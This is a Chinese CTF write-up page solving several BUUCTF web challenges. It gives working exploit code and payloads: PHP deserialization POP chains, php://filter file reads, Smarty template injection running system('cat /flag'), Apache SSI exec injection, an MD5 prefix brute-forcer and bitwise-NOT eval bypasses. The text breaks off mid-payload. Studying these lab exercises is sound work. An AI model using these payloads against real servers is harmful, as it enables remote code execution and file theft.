<h1 id="0x37-MRCTF2020-Ezpop"><a href="#0x37-MRCTF2020-Ezpop" class="headerlink" title="0x37.[MRCTF2020]Ezpop"></a>0x37.[MRCTF2020]Ezpop</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">Welcome to index.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//flag is in flag.php</span></span><br><span class="line"><span class="comment">//WTF IS THIS?</span></span><br><span class="line"><span class="comment">//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95</span></span><br><span class="line"><span class="comment">//And Crack It!</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span>  <span class="variable">$var</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">append</span>(<span class="params"><span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$value</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;append(<span class="keyword">$this</span>-&gt;var);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span>=<span class="string">&#x27;index.php&#x27;</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;source = <span class="variable">$file</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Welcome to &#x27;</span>.<span class="keyword">$this</span>-&gt;source.<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;str-&gt;source;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&quot;/gopher|http|file|ftp|https|dict|\.\./i&quot;</span>, <span class="keyword">$this</span>-&gt;source)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;hacker&quot;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;source = <span class="string">&quot;index.php&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;p = <span class="keyword">array</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$function</span> = <span class="keyword">$this</span>-&gt;p;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$function</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;pop&#x27;</span>]))&#123;</span><br><span class="line">    @unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;pop&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="variable">$a</span>=<span class="keyword">new</span> Show;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">__construct()<span class="comment">//当一个对象创建时被调用</span></span><br><span class="line">__destruct() <span class="comment">//当一个对象销毁时被调用</span></span><br><span class="line">__toString() <span class="comment">//当一个对象被当作一个字符串使用</span></span><br><span class="line">__sleep()<span class="comment">//在对象在被序列化之前运行</span></span><br><span class="line">__wakeup()<span class="comment">//将在反序列化之后立即被调用(通过序列化对象元素个数不符来绕过)</span></span><br><span class="line">__get()<span class="comment">//访问类中一个不存在的属性时自动调用</span></span><br><span class="line">__set()<span class="comment">//设置一个类的成员变量时调用</span></span><br><span class="line">__invoke()<span class="comment">//调用函数的方式调用一个对象时的回应方法</span></span><br><span class="line">__call()<span class="comment">//当调用一个对象中的不能用的方法的时候就会执行这个函数</span></span><br><span class="line">此处用到的主要是__toString()，__wakeup()，__get()，__invoke()，</span><br></pre></td></tr></table></figure>

<p>首先是Modifier类，append可以包含文件，<code>__invoke</code>中调用了append方法，<code>__invoke</code>自动调用的条件是类被当做一个函数被调用。</p>
<p>接下来是Test，construct用不上 ，直接看get，可以看到p被当做函数来调用，正好符合Modifier的要求。魔法函数__get会在访问类中一个不存在的属性时自动调用。</p>
<p>然后是Show类，魔术方法__toString中会返回属性str中的属性source，如果刚刚提到的source属性不存在，那么就符合了Test类中的要求，魔术方法__toString在类被当做一个字符串处理时会被自动调用。</p>
<p>wakewp将source传入正则进行匹配，这时source被当做字符串来处理，最终会调用tostring方法</p>
<p>于是：<code>反序列化-&gt; show.__wakeup-&gt; show.tostring-&gt;test.get-&gt;modiflier.invoke-&gt;include</code></p>
<p>exp:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Modifier</span> </span>&#123;</span><br><span class="line">    <span class="comment">///protected  $var=&quot;flag.php&quot;;</span></span><br><span class="line">	<span class="keyword">protected</span> <span class="variable">$var</span>=<span class="string">&quot;php://filter/read=convert.base64-encode/resource=flag.php&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Show</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$source</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$str</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$p</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> Show();</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> Show();</span><br><span class="line"><span class="variable">$a</span>-&gt;source=<span class="variable">$b</span>;</span><br><span class="line"><span class="variable">$b</span>-&gt;str=<span class="keyword">new</span> Test();</span><br><span class="line">(<span class="variable">$b</span>-&gt;str)-&gt;p=<span class="keyword">new</span> Modifier();</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize(<span class="variable">$a</span>)); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="0x38-NPUCTF2020-ReadlezPHP"><a href="#0x38-NPUCTF2020-ReadlezPHP" class="headerlink" title="0x38.[NPUCTF2020]ReadlezPHP"></a>0x38.[NPUCTF2020]ReadlezPHP</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">#error_reporting(0);</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">HelloPhp</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$a</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$b</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;a = <span class="string">&quot;Y-m-d h:i:s&quot;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;b = <span class="string">&quot;date&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$a</span> = <span class="keyword">$this</span>-&gt;a;</span><br><span class="line">        <span class="variable">$b</span> = <span class="keyword">$this</span>-&gt;b;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$b</span>(<span class="variable">$a</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$c</span> = <span class="keyword">new</span> HelloPhp;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;source&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">die</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line">@<span class="variable">$ppp</span> = unserialize(<span class="variable">$_GET</span>[<span class="string">&quot;data&quot;</span>]);</span><br><span class="line"><span class="number">2021</span>-<span class="number">10</span>-<span class="number">05</span> <span class="number">10</span>:<span class="number">21</span>:<span class="number">03</span></span><br></pre></td></tr></table></figure>

<p>可以直接命令执行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">HelloPhp</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$b</span>=<span class="string">&quot;assert&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$a</span>=<span class="string">&quot;phpinfo()&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$a</span> = <span class="keyword">$this</span>-&gt;a;</span><br><span class="line">        <span class="variable">$b</span> = <span class="keyword">$this</span>-&gt;b;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$b</span>(<span class="variable">$a</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$c</span> = <span class="keyword">new</span> HelloPhp;</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="variable">$c</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="0x39-CISCN2019-华东南赛区-Web11-SSTI"><a href="#0x39-CISCN2019-华东南赛区-Web11-SSTI" class="headerlink" title="0x39.[CISCN2019 华东南赛区]Web11(SSTI)"></a>0x39.[CISCN2019 华东南赛区]Web11(SSTI)</h1><p><img src="/2021/09/16/BUU-WEB-0x30-0x3F/image-20211005183401519.png" alt="image-20211005183401519"></p>
<p>抓包改下xff，确实有用。</p>
<p>看了wp说是Smarty SSTI，Smarty 是一个 PHP 的模板引擎。</p>
<p>查看 Smarty 版本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;$smarty.version&#125;</span><br></pre></td></tr></table></figure>

<p> <strong>漏洞利用</strong></p>
<p>不同版本可以利用的方式不同，常用的有以下三种方法：</p>
<p>1.旧版 Smarty 支持使用{php}{&#x2F;php}标签来执行被包裹其中的 php 指令。</p>
<p>Smarty3 的官方手册描述：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Smarty已经废弃&#123;php&#125;标签，强烈建议不要使用。在Smarty 3.1，&#123;php&#125;仅在SmartyBC中可用</span><br></pre></td></tr></table></figure>

<p>2.旧版 Smarty 可以通过 self 获取 Smarty 类再调用其静态方法实现文件读写</p>
<p>3.PHP 函数都可以在模板中使用，因此注入时，可以直接使用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;system(&#x27;ls&#x27;)&#125;</span><br></pre></td></tr></table></figure>

<p>便可随意执行命令；执行多条语句的话可以使用下面的形式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;system(&#x27;ls&#x27;)&#125;&#123;system(&#x27;cat index.php&#x27;)&#125;</span><br></pre></td></tr></table></figure>

<p>每个{if}必须有一个配对的{&#x2F;if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用。<br>也就是说我们把php代码写在<code>&#123;if PHP代码&#125;&#123;/if&#125;</code> 就可以了，PHP代码可以被执行。</p>
<p>payload有很多：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;if show_source(&#x27;/flag&#x27;)&#125;&#123;/if&#125;</span><br><span class="line">&#123;readfile(&#x27;/flag&#x27;)&#125;</span><br><span class="line">&#123;if system(&#x27;cat /flag&#x27;)&#125;&#123;/if&#125;</span><br></pre></td></tr></table></figure>

<h1 id="0x3A-BJDCTF2020-EasySearch"><a href="#0x3A-BJDCTF2020-EasySearch" class="headerlink" title="0x3A.[BJDCTF2020]EasySearch"></a>0x3A.[BJDCTF2020]EasySearch</h1><blockquote>
<p>  SSI(Server Side Includes)注入漏洞</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	ob_start();</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">get_hash</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="variable">$chars</span> = <span class="string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&amp;*()+-&#x27;</span>;</span><br><span class="line">		<span class="variable">$random</span> = <span class="variable">$chars</span>[mt_rand(<span class="number">0</span>,<span class="number">73</span>)].<span class="variable">$chars</span>[mt_rand(<span class="number">0</span>,<span class="number">73</span>)].<span class="variable">$chars</span>[mt_rand(<span class="number">0</span>,<span class="number">73</span>)].<span class="variable">$chars</span>[mt_rand(<span class="number">0</span>,<span class="number">73</span>)].<span class="variable">$chars</span>[mt_rand(<span class="number">0</span>,<span class="number">73</span>)];<span class="comment">//Random 5 times</span></span><br><span class="line">		<span class="variable">$content</span> = uniqid().<span class="variable">$random</span>;</span><br><span class="line">		<span class="keyword">return</span> sha1(<span class="variable">$content</span>); </span><br><span class="line">	&#125;</span><br><span class="line">    header(<span class="string">&quot;Content-Type: text/html;charset=utf-8&quot;</span>);</span><br><span class="line">	***</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>]) <span class="keyword">and</span> <span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>] != <span class="string">&#x27;&#x27;</span> )</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="variable">$admin</span> = <span class="string">&#x27;6d0bc1&#x27;</span>;</span><br><span class="line">        <span class="keyword">if</span> ( <span class="variable">$admin</span> == substr(md5(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]),<span class="number">0</span>,<span class="number">6</span>)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;alert(&#x27;[+] Welcome to manage system&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line">            <span class="variable">$file_shtml</span> = <span class="string">&quot;public/&quot;</span>.get_hash().<span class="string">&quot;.shtml&quot;</span>;</span><br><span class="line">            <span class="variable">$shtml</span> = fopen(<span class="variable">$file_shtml</span>, <span class="string">&quot;w&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;Unable to open file!&quot;</span>);</span><br><span class="line">            <span class="variable">$text</span> = <span class="string">&#x27;</span></span><br><span class="line"><span class="string">            ***</span></span><br><span class="line"><span class="string">            ***</span></span><br><span class="line"><span class="string">            &lt;h1&gt;Hello,&#x27;</span>.<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>].<span class="string">&#x27;&lt;/h1&gt;</span></span><br><span class="line"><span class="string">            ***</span></span><br><span class="line"><span class="string">			***&#x27;</span>;</span><br><span class="line">            fwrite(<span class="variable">$shtml</span>,<span class="variable">$text</span>);</span><br><span class="line">            fclose(<span class="variable">$shtml</span>);</span><br><span class="line">            ***</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;[!] Header  error ...&quot;</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;alert(&#x27;[!] Failed&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line">            </span><br><span class="line">    &#125;<span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">	***</span><br><span class="line">    &#125;</span><br><span class="line">	***</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100000000</span>): </span><br><span class="line">    a = hashlib.md5(<span class="built_in">str</span>(i).encode(<span class="string">&quot;utf-8&quot;</span>)).hexdigest() </span><br><span class="line">    f a[<span class="number">0</span>:<span class="number">6</span>] == <span class="string">&#x27;6d0bc1&#x27;</span>: </span><br><span class="line">        <span class="built_in">print</span>(i)</span><br></pre></td></tr></table></figure>

<p>发过去之后：public&#x2F;dc64a1535c94b7babc55ab528fea462c46e94e90.shtml</p>
<p>然后回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Hello,6d0bc1</span><br><span class="line"></span><br><span class="line">data: Tuesday, 05-Oct-2021 10:58:18 UTC</span><br><span class="line"></span><br><span class="line">Client IP: 117.152.88.50</span><br></pre></td></tr></table></figure>

<p>感觉是xff，但是没用，看wp说是《Apache SSI远程命令执行漏洞》</p>
<p>在username写<code>&lt;!--#exec cmd=&quot;ls&quot;--&gt;</code>，然后在response给的链接打开。</p>
<p>慢慢找就找到flag了。</p>
<h1 id="0x3B-BSidesCF-2019-Futurella"><a href="#0x3B-BSidesCF-2019-Futurella" class="headerlink" title="0x3B.[BSidesCF 2019]Futurella"></a>0x3B.[BSidesCF 2019]Futurella</h1><p>….也不知道想考啥，进去就有flag</p>
<h1 id="0x3C-GYCTF2020-FlaskApp"><a href="#0x3C-GYCTF2020-FlaskApp" class="headerlink" title="0x3C.[GYCTF2020]FlaskApp"></a>0x3C.[GYCTF2020]FlaskApp</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/decode&#x27;</span>,methods=[<span class="string">&#x27;POST&#x27;</span>,<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decode</span>():</span></span><br><span class="line">    <span class="keyword">if</span> request.values.get(<span class="string">&#x27;text&#x27;</span>) :</span><br><span class="line">        text = request.values.get(<span class="string">&quot;text&quot;</span>)</span><br><span class="line">        text_decode = base64.b64decode(text.encode())</span><br><span class="line">        tmp = <span class="string">&quot;结果 ： &#123;0&#125;&quot;</span>.<span class="built_in">format</span>(text_decode.decode())</span><br><span class="line">        <span class="keyword">if</span> waf(tmp) :</span><br><span class="line">            flash(<span class="string">&quot;no no no !!&quot;</span>)</span><br><span class="line">	<span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;decode&#x27;</span>)</span><br><span class="line">        res =  render_template_string(tmp)</span><br></pre></td></tr></table></figure>

<h1 id="0x3D-BSidesCF-2019-Kookie"><a href="#0x3D-BSidesCF-2019-Kookie" class="headerlink" title="0x3D.[BSidesCF 2019]Kookie"></a>0x3D.[BSidesCF 2019]Kookie</h1><p>提示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> Log in as admin!</span><br><span class="line"></span><br><span class="line">We found the account cookie / monster </span><br></pre></td></tr></table></figure>

<p>构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: username=admin</span><br></pre></td></tr></table></figure>

<h1 id="0x3E-极客大挑战-2019-RCE-ME"><a href="#0x3E-极客大挑战-2019-RCE-ME" class="headerlink" title="0x3E.[极客大挑战 2019]RCE ME"></a>0x3E.[极客大挑战 2019]RCE ME</h1><p>审计：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">            <span class="variable">$code</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">                    <span class="keyword">if</span>(strlen(<span class="variable">$code</span>)&gt;<span class="number">40</span>)&#123;</span><br><span class="line">                                        <span class="keyword">die</span>(<span class="string">&quot;This is too Long.&quot;</span>);</span><br><span class="line">                                                &#125;</span><br><span class="line">                    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[A-Za-z0-9]+/&quot;</span>,<span class="variable">$code</span>))&#123;</span><br><span class="line">                                        <span class="keyword">die</span>(<span class="string">&quot;NO.&quot;</span>);</span><br><span class="line">                                                &#125;</span><br><span class="line">                    @<span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">            highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// <span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>正则可视化：</p>
<p><img src="/2021/09/16/BUU-WEB-0x30-0x3F/image-20220405231609674.png" alt="image-20220405231609674"></p>
<p>异或或者去取反绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> urlencode(~<span class="string">&#x27;phpinfo&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    </span><br><span class="line">payload:</span><br><span class="line">?code=(~%<span class="number">8</span>F%<span class="number">97</span>%<span class="number">8</span>F%<span class="number">96</span>%<span class="number">91</span>%<span class="number">99</span>%<span class="number">90</span>)();</span><br></pre></td></tr></table></figure>

<p><img src="/2021/09/16/BUU-WEB-0x30-0x3F/image-20220405233218476.png" alt="image-20220405233218476"></p>
<p>禁用了很多函数，</p>
<p>可以使用scandir和readfile：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment">//print_r(scandir(&#x27;./&#x27;))</span></span><br><span class="line"><span class="keyword">echo</span> urlencode(~<span class="string">&#x27;print_r&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> urlencode(~<span class="string">&#x27;scandir&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">%<span class="number">8</span>F%<span class="number">8</span>D%<span class="number">96</span>%<span class="number">91</span>%<span class="number">8</span>B%A0%<span class="number">8</span>D</span><br><span class="line">%<span class="number">8</span>C%<span class="number">9</span>C%<span class="number">9</span>E%<span class="number">91</span>%<span class="number">9</span>B%<span class="number">96</span>%<span class="number">8</span>D</span><br><span class="line">payload:</span><br><span class="line">(~%<span class="number">8</span>F%<span class="number">8</span>D%<span class="number">96</span>%<span class="number">91</span>%<span class="number">8</span>B%A0%<span class="number">8</span>D)((~%<span class="number">8</span>C%<span class="number">9</span>C%<span class="number">9</span>E%<span class="number">91</span>%<span class="number">9</span>B%<span class="number">96</span>%<span class="number">8</span>D)((<span 